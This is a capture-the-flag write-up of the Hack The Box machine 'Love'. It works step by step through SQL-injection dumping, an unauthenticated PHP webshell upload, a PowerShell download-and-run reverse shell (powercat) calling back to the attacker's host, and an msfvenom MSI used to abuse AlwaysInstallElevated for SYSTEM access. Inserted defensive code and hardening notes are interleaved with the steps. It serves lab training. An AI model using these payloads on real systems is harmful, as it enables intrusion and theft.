HTB: Love Writeup

Writeup for the Hack The Box machine Love.

The nmap scan results are below.

└─$ nmap -Pn -A $RHOST -oG general-portscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 08:57 EST
Nmap scan report for 10.129.48.103
Host is up (0.46s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   GenericLines, GetRequest, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, SIPOptions, SSLSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|_    Host '10.10.16.174' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/6%Time=677BE173%P=x86_64-pc-linux-gnu%r(
SF:NULL,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLi
SF:nes,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4B,"G\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionReq,4B,"G\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4B,"G\
SF:0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4B,"G\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(LPDString,4B,"G\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,4B,"G\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4B,"G\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4B,"G\0\0\x01\xffj\x
SF:04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(LANDesk-RC,4B,"G\0\0\x01\xffj\x04H
SF:ost\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(TerminalServer,4B,"G\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x20t
SF:o\x20this\x20MariaDB\x20server")%r(NCP,4B,"G\0\0\x01\xffj\x04Host\x20'1
SF:0\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m11s, median: 21m32s
| smb2-time: 
|   date: 2025-01-06T14:20:23
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-06T06:20:27-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds

Browsing to the target IP showed a login page for an application called Voting System (http://10.129.48.103/index.php).

Running gobuster turned up an /admin directory; opening it showed the login page for the Voting System admin panel (http://10.129.48.103/admin/index.php).

At a glance the two login pages look identical, but http://10.129.48.103/index.php asks for an ID, whereas http://10.129.48.103/admin/index.php asks for a username.

Voting System appears to be a PHP application for running votes, and as the searchsploit output shows, it has multiple known vulnerabilities.

└─$ searchsploit voting system           
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass                                                                                                                                     | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                                                                                                                          | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)                                                                                                                 | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)                                                                                            | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting                                                                                                 | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                                                                                                                                 | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)                                                                                                        | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                                                                                                                      | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI  (Unauthenticated SQL injection)                                                                                                             | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection                                                                        | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I decided to try these vulnerabilities against the target.

Exploiting the time-based SQLi vulnerability (php/webapps/49817.txt) let me dump the contents of the MySQL database.

└─$ cat post.txt                                                            
POST /login.php HTTP/1.1
Host: 10.129.48.103
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://10.129.48.103
Connection: keep-alive
Referer: http://10.129.48.103/index.php
Cookie: PHPSESSID=nn7ov26np0u3m1gucjhjsmnavp
Upgrade-Insecure-Requests: 1

voter=admin&password=fuga&login=

## Used sqlmap to generate SQLi traffic
sqlmap -r post.txt -p voter --dump
[11:55:55] [INFO] retrieved: admin
Database: votesystem
Table: admin
[1 entry]
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+
| id | photo                       | lastname | password                                                     | username | firstname | created_on |
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+
| 1  | facebook-profile-image.jpeg | Devierte | $2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC | admin    | Neovic    | 2018-04-02 |
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+

From the admin table of the votesystem database I obtained the admin user's password hash, $2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC.

I tried cracking this hash with John the Ripper, but the plaintext password could not be recovered.

Next I tried the remote code execution vulnerability (php/webapps/49846.txt).

According to the advisory, sending a crafted HTTP request to /admin/candidates_add.php allows a malicious file such as a webshell to be uploaded without authentication. The uploaded file is then reachable under /images.
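The two defects the advisory describes are that the upload handler does not require an admin session and that it stores the client-supplied filename under a web-served directory. The following is an added illustration of the server-side checks that close both gaps; it is written in Python for this writeup and is not code from the Voting System application (`validate_photo`, `ALLOWED` and the `is_admin` flag are hypothetical names, and the PHP payload is the one-liner shown later on this page).

```python
import os
import secrets

# Hypothetical hardened upload check written for this writeup; not code from
# the Voting System application. Only image extensions are accepted, the
# declared extension must match the file's magic bytes, and the stored name
# is generated server-side, so the client never chooses a ".php" name.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def validate_photo(filename: str, data: bytes, is_admin: bool):
    """Return (ok, reason_or_stored_name).

    Checks, in order: the caller holds an admin session (the vulnerable
    candidates_add.php did not check this), the extension is on the
    allowlist, the content starts with the matching magic bytes, no PHP
    open tags are embedded (polyglot guard), and the stored name is random.
    """
    if not is_admin:
        return False, "not authenticated as admin"
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tags"
    stored = f"{secrets.token_hex(16)}.{ext}"
    return True, stored


if __name__ == "__main__":
    # Constructed inputs: the page's webshell payload, and a minimal JPEG header.
    print(validate_photo("webshell.php", b"<?php echo system($_REQUEST['cmd']); ?>", True))
    print(validate_photo("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16, True))
```

Even with these checks, the upload directory should not be allowed to execute scripts at all; with mod_php that is a `php_admin_flag engine off` inside a `<Directory>` block for the images folder, which would have turned the uploaded webshell into plain text.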

I connected to port 80 on the target with telnet and sent the raw HTTP request by hand.

## Connect to port 80 via telnet
telnet $RHOST 80

## Send below crafted HTTP request to upload webshell
POST /admin/candidates_add.php HTTP/1.1
Host: 10.129.48.103
Content-Length: 285
Cache-Control: max-age=0
Origin: http://10.129.48.103
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.129.48.103/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="webshell.php"
Content-Type: application/octet-stream

<?php echo system($_REQUEST['cmd']); ?>

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add

The result of running it is below.

└─$ telnet $RHOST 80
Trying 10.129.48.103...
Connected to 10.129.48.103.
Escape character is '^]'.
POST /admin/candidates_add.php HTTP/1.1
Host: 10.129.48.103
Content-Length: 285
Cache-Control: max-age=0
Origin: http://10.129.48.103
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.129.48.103/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="webshell.php"
Content-Type: application/octet-stream

<?php echo system($_REQUEST['cmd']); ?>

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add

HTTP/1.1 302 Found
Date: Tue, 07 Jan 2025 15:51:45 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Set-Cookie: PHPSESSID=26g1h9c0l0708fgnga9d0u1vr8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: candidates.php
Content-Length: 640
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>:  Undefined index: admin in <b>C:\xampp\htdocs\omrs\admin\includes\session.php</b> on line <b>9</b><br />
<br />
<b>Notice</b>:  Undefined index: firstname in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>5</b><br />
<br />
<b>Notice</b>:  Undefined index: lastname in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>6</b><br />
<br />
<b>Notice</b>:  Undefined index: position in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>7</b><br />
<br />
<b>Notice</b>:  Undefined index: platform in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>8</b><br />
Connection closed by foreign host.

The webshell was uploaded, and running the dir command through it succeeded.

└─$ curl -i http://$RHOST/images/webshell.php?cmd=dir
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 15:53:51 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 630
Content-Type: text/html; charset=UTF-8

 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

01/07/2025  07:51 AM    <DIR>          .
01/07/2025  07:51 AM    <DIR>          ..
05/18/2018  07:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  02:53 PM                 0 index.html.txt
01/26/2021  11:08 PM               844 index.jpeg
08/24/2017  03:00 AM            26,644 profile.jpg
01/07/2025  07:51 AM                41 webshell.php
               5 File(s)         31,769 bytes
               2 Dir(s)   4,171,530,240 bytes free
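From the defender's side, the upload and the two webshell requests above leave a recognisable pattern in the Apache access log: a POST to the admin upload handler followed by requests for a .php file under a directory that should only serve images, carrying a command parameter. The following detection logic is an added example written for this writeup, not part of the original page or of any tool it uses; the log lines are constructed to mirror the requests shown above, and `analyse`, `STATIC_DIRS`, `UPLOAD_HANDLERS` and `SHELL_PARAMS` are hypothetical names.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines modelled on the requests in this
# writeup; they are sample data, not logs collected from the box.
SAMPLE_LOG = """\
10.10.16.174 - - [07/Jan/2025:07:51:45 -0800] "POST /admin/candidates_add.php HTTP/1.1" 302 640 "-" "Mozilla/5.0"
10.10.16.174 - - [07/Jan/2025:07:53:51 -0800] "GET /images/webshell.php?cmd=dir HTTP/1.1" 200 630 "-" "curl/8.5.0"
10.10.16.174 - - [07/Jan/2025:07:56:18 -0800] "GET /images/webshell.php?cmd=dir%20c:%5Cusers HTTP/1.1" 200 396 "-" "curl/8.5.0"
10.10.16.50 - - [07/Jan/2025:07:57:02 -0800] "GET /images/profile.jpg HTTP/1.1" 200 26644 "http://10.129.48.103/" "Mozilla/5.0"
10.10.16.50 - - [07/Jan/2025:07:58:10 -0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Parses the leading fields of the combined log format; the trailing referer
# and user-agent are not needed for these rules.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve static content.
STATIC_DIRS = ("/images/",)
# Handlers that should only be reachable from an admin session; on this
# application an unauthenticated POST here is exactly what the exploit sends.
UPLOAD_HANDLERS = ("/admin/candidates_add.php",)
# Query parameter names commonly used by one-line command shells.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}


def analyse(log_text: str):
    """Return a list of (client_ip, rule, request_target) alerts."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than fail the whole run
        url = urlsplit(m["target"])
        path, query = url.path.lower(), parse_qs(url.query)
        if path.startswith(STATIC_DIRS) and path.endswith((".php", ".phtml", ".phar")):
            alerts.append((m["ip"], "script request in static directory", m["target"]))
        if SHELL_PARAMS & set(query):
            alerts.append((m["ip"], "command parameter in query string", m["target"]))
        if m["method"] == "POST" and path in UPLOAD_HANDLERS:
            alerts.append((m["ip"], "POST to admin upload handler", m["target"]))
    return alerts


if __name__ == "__main__":
    for ip, rule, target in analyse(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{target}")
```

The upload-handler rule on its own is noisy on a site where admins legitimately add candidates; correlating it with the other two rules from the same client within a few minutes, as in the sample, is what makes the sequence worth escalating.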

After running a few more commands, I found the user flag at c:\users\Phoebe\desktop\user.txt.

└─$ curl -i "http://$RHOST/images/webshell.php?cmd=dir%20c:%5Cusers%5CPhoebe%5Cdesktop"
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 15:56:18 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 396
Content-Type: text/html; charset=UTF-8

 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\users\Phoebe\desktop

04/13/2021  02:20 AM    <DIR>          .
04/13/2021  02:20 AM    <DIR>          ..
01/07/2025  05:16 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,171,186,176 bytes free

Next comes privilege escalation, but first, since the uploaded webshell is awkward to work with, I decided to set up a proper reverse shell.

I planted Powercat through the webshell with the following command.

curl -i "http://$RHOST/images/webshell.php?cmd=powershell.exe%20-nop%20-w%20hidden%20IEX(New-Object%20System.Net.WebClient).DownloadString('http://10.10.16.174/powercat.ps1');powercat%20-c%2010.10.16.174%20-p%2053%20-e%20cmd"

## URL decodes to:
curl -i "http://$RHOST/images/webshell.php?cmd=powershell.exe -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.174/powercat.ps1');powercat -c 10.10.16.174 -p 53 -e cmd"

This gave me a more interactive way to run commands.

└─$ rlwrap nc -nvlp 53          
listening on [any] 53 ...
connect to [10.10.16.174] from (UNKNOWN) [10.129.48.103] 50016
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>hostname
hostname
Love

Enumerating the target, I found a suspicious file, C:\xampp\htdocs\passwordmanager\creds.txt.

PS C:\xampp\htdocs\passwordmanager> dir
dir


    Directory: C:\xampp\htdocs\passwordmanager


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/12/2021  12:25 PM             45 creds.txt                                                            
-a----         1/27/2021   5:32 PM           4720 index.php 

This file contained the admin password @LoveIsInTheAir!!!!.

PS C:\xampp\htdocs\passwordmanager> type creds.txt
type creds.txt
Vote Admin Creds admin: @LoveIsInTheAir!!!!

However, this password is only for logging into the Voting System admin panel; it could not be used to escalate privileges.

Running WinPEAS on the target revealed that AlwaysInstallElevated is enabled.

╔══════════╣ Checking AlwaysInstallElevated
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

When AlwaysInstallElevated is enabled, Windows Installer packages are installed with elevated privileges.

Abusing this setting should therefore allow a reverse shell packaged as an MSI file to run with high privileges.
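The detail that matters when auditing this finding is that the policy only takes effect when the value is set to 1 under both HKLM and HKCU; a lone HKLM or HKCU entry is ignored by Windows Installer, which is why WinPEAS reports both. The following offline check is an added example for this writeup, not part of WinPEAS or the original page: it parses the text that `reg query` prints for the two Installer policy keys (the sample output is constructed to match the WinPEAS finding above) and reports whether the combination is effective. `parse_always_install_elevated`, `is_exploitable` and `HIVES` are hypothetical names.

```python
import re

# Constructed `reg query` output for the two AlwaysInstallElevated locations,
# modelled on the WinPEAS finding above; sample data, not collected from the box.
SAMPLE_REG_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

HIVES = ("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")


def parse_always_install_elevated(text: str) -> dict:
    """Map each hive to its AlwaysInstallElevated DWORD, or None if the
    value (or the whole policy key) is absent."""
    result = {hive: None for hive in HIVES}
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        for hive in HIVES:
            if stripped.startswith(hive + "\\"):
                current = hive  # subsequent value lines belong to this key
        m = VALUE_RE.match(line)
        if m and current:
            result[current] = int(m.group(1), 16)
    return result


def is_exploitable(values: dict) -> bool:
    """The policy is effective only when BOTH the machine and the user value
    are 1; anything else (0, missing, or only one hive set) is not."""
    return all(values.get(h) == 1 for h in HIVES)


if __name__ == "__main__":
    found = parse_always_install_elevated(SAMPLE_REG_OUTPUT)
    print(found, "effective" if is_exploitable(found) else "not effective")
```

The fix is to disable the policy in both places (Computer Configuration and User Configuration, under Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges"), or to set both DWORDs to 0 on a standalone host; clearing only one of the two is already enough to break the escalation, but leaving a stray 1 behind invites it to come back.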

On the attacking machine, build the reverse shell as an MSI file.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.174 LPORT=53 -a x64 --platform Windows -f msi -o myshell.msi

Start a Python HTTP server and a listener for the reverse shell connection.

python3 -m http.server 80
rlwrap nc -nvlp 53

Transfer the reverse shell to the target and run it.

curl http://10.10.16.174/myshell.msi -o myshell.msi
myshell.msi

The shell came back running as SYSTEM.

└─$ rlwrap nc -nvlp 53
listening on [any] 53 ...
connect to [10.10.16.174] from (UNKNOWN) [10.129.48.103] 50034
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

The root flag is at c:\users\administrator\desktop\root.txt.

C:\WINDOWS\system32>dir c:\users\administrator\desktop
dir c:\users\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\users\administrator\desktop

04/13/2021  02:20 AM    <DIR>          .
04/13/2021  02:20 AM    <DIR>          ..
01/09/2025  04:40 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,157,509,632 bytes free
